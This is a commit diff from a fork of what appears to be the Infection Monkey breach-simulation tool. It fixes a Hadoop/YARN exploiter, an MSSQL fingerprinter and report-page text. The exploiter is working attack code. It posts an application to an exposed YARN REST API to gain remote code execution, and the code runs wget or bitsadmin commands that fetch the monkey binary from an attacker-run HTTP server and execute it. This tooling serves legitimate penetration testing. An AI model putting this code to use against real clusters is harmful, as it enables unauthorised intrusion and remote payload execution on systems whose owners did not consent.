forked from p34709852/monkey
Fixed reporting and upploading bugs
This commit is contained in:
parent
5674bebfa6
commit
c7952dcbc5
|
@ -12,7 +12,7 @@ from exploit.web_rce import WebRCE
|
|||
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
|
||||
import posixpath
|
||||
from threading import Lock
|
||||
from model import DROPPER_ARG
|
||||
from model import DROPPER_ARG, DOWNLOAD_TIMEOUT
|
||||
|
||||
__author__ = 'VakarisZ'
|
||||
|
||||
|
@ -20,13 +20,17 @@ LOG = logging.getLogger(__name__)
|
|||
|
||||
class HadoopExploiter(WebRCE):
|
||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||
HADOOP_PORTS = ["8088"]
|
||||
LINUX_COMMAND = "wget -O %(monkey_path)s %(http_path)s " \
|
||||
"&& chmod +x %(monkey_path)s " \
|
||||
# TODO add more hadoop ports
|
||||
HADOOP_PORTS = [["8088", False]]
|
||||
|
||||
# We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes
|
||||
# to download monkey at the same time
|
||||
LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
|
||||
"&& wget -O %(monkey_path)s %(http_path)s " \
|
||||
"; chmod +x %(monkey_path)s " \
|
||||
"&& %(monkey_path)s %(monkey_type)s %(parameters)s"
|
||||
WINDOWS_COMMAND = "bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s " \
|
||||
"&& %(monkey_path)s %(monkey_type)s %(parameters)s"
|
||||
|
||||
LOCK = Lock()
|
||||
|
||||
def __init__(self, host):
|
||||
|
@ -47,25 +51,33 @@ class HadoopExploiter(WebRCE):
|
|||
if not src_path:
|
||||
LOG.info("Can't find suitable monkey executable for host %r", self.host)
|
||||
return False
|
||||
# Determine which destination path to use
|
||||
# Determine where to save monkey on the target
|
||||
LOG.debug("Monkey path found")
|
||||
path = WebRCE.get_monkey_dest_path(self._config, src_path)
|
||||
# Build command to execute
|
||||
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path)
|
||||
if 'linux' in self.host.os['type']:
|
||||
command = self.LINUX_COMMAND % {"monkey_path": path, "http_path": src_path,
|
||||
"monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
|
||||
else:
|
||||
command = self.WINDOWS_COMMAND % {"monkey_path": path, "http_path": src_path,
|
||||
"monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
|
||||
if not path:
|
||||
return False
|
||||
# To avoid race conditions we pass a locked lock to http servers thread
|
||||
self.LOCK.acquire()
|
||||
# Create server for http download and wait for it's startup.
|
||||
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path, self.LOCK)
|
||||
self.LOCK.acquire()
|
||||
self.exploit(url, command)
|
||||
|
||||
# Build command to execute
|
||||
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path)
|
||||
if 'linux' in self.host.os['type']:
|
||||
command = self.LINUX_COMMAND % {"monkey_path": path, "http_path": http_path,
|
||||
"monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
|
||||
else:
|
||||
command = self.WINDOWS_COMMAND % {"monkey_path": path, "http_path": http_path,
|
||||
"monkey_type": DROPPER_ARG, "parameters": monkey_cmd}
|
||||
# command = "! [ -f %(monkey_path)s ] wget -O %(monkey_path)s %(http_path)s" % {"monkey_path": path, "http_path": http_path}
|
||||
if not path:
|
||||
return False
|
||||
|
||||
if not self.exploit(url, command):
|
||||
return False
|
||||
self.LOCK.release()
|
||||
http_thread.join(DOWNLOAD_TIMEOUT)
|
||||
http_thread.stop()
|
||||
return True
|
||||
|
||||
def exploit(self, url, command):
|
||||
# Get the newly created application id
|
||||
|
@ -85,10 +97,17 @@ class HadoopExploiter(WebRCE):
|
|||
"application-type": "YARN"
|
||||
}
|
||||
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload)
|
||||
if resp.status_code == 202:
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
|
||||
def try_exploit(self, url):
|
||||
# Get the newly created application id
|
||||
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
|
||||
try:
|
||||
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"))
|
||||
except requests.ConnectionError:
|
||||
return False
|
||||
if resp.status_code == 200:
|
||||
return True
|
||||
else:
|
||||
|
|
|
@ -29,7 +29,8 @@ class MSSQLFinger(HostFinger):
|
|||
Discovered server information written to the Host info struct.
|
||||
True if success, False otherwise.
|
||||
"""
|
||||
|
||||
# TODO remove auto-return
|
||||
return False
|
||||
assert isinstance(host, VictimHost)
|
||||
|
||||
# Create a UDP socket and sets a timeout
|
||||
|
|
|
@ -332,7 +332,7 @@ class ReportPageComponent extends AuthComponent {
|
|||
<li>Oracle WebLogic servers are vulnerable to remote code execution. (<a
|
||||
href="https://nvd.nist.gov/vuln/detail/CVE-2017-10271">
|
||||
CVE-2017-10271</a>)</li> : null }
|
||||
{this.state.report.overview.issues[this.Issue.WEBLOGIC] ?
|
||||
{this.state.report.overview.issues[this.Issue.HADOOP] ?
|
||||
<li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
|
||||
</ul>
|
||||
</div>
|
||||
|
@ -722,7 +722,7 @@ class ReportPageComponent extends AuthComponent {
|
|||
generateHadoopIssue(issue) {
|
||||
return (
|
||||
<li>
|
||||
Run Hadoop in secure mode(<a href="http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html">
|
||||
Run Hadoop in secure mode(<a href="http://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/SecureMode.html">
|
||||
add Kerberos authentication</a>).
|
||||
<CollapsibleWellComponent>
|
||||
Oracle WebLogic server at <span className="label label-primary">{issue.machine}</span> (<span
|
||||
|
|
Loading…
Reference in New Issue